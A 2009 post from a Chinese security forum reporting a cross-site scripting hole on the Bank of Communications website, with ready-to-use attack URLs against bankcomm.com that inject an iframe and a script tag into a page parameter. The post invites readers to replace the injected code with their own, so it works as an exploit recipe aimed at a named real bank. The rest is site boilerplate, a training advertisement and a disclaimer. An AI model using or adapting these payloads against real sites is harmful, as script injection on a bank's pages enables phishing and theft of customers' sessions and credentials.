黑基Web安全攻防班
黑基网 首页 IT技术 安全攻防 查看内容

交通银行网页存在跨站漏洞

2009-2-12 06:30| 投稿: security

摘要: 新闻来源:原创交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程"   提交: http://www.ba...
新闻来源:原创交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程"   提交: http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://www.cnbeta.com></iframe> 为cnbeta增加点流量,点击这里测试 提交: http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<script>alert("吓小MM用的")</script> 吓小MM用的,点击这里测试 其他的不演示了 把上面URL中“业务推荐”后的代码换成你的即可.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部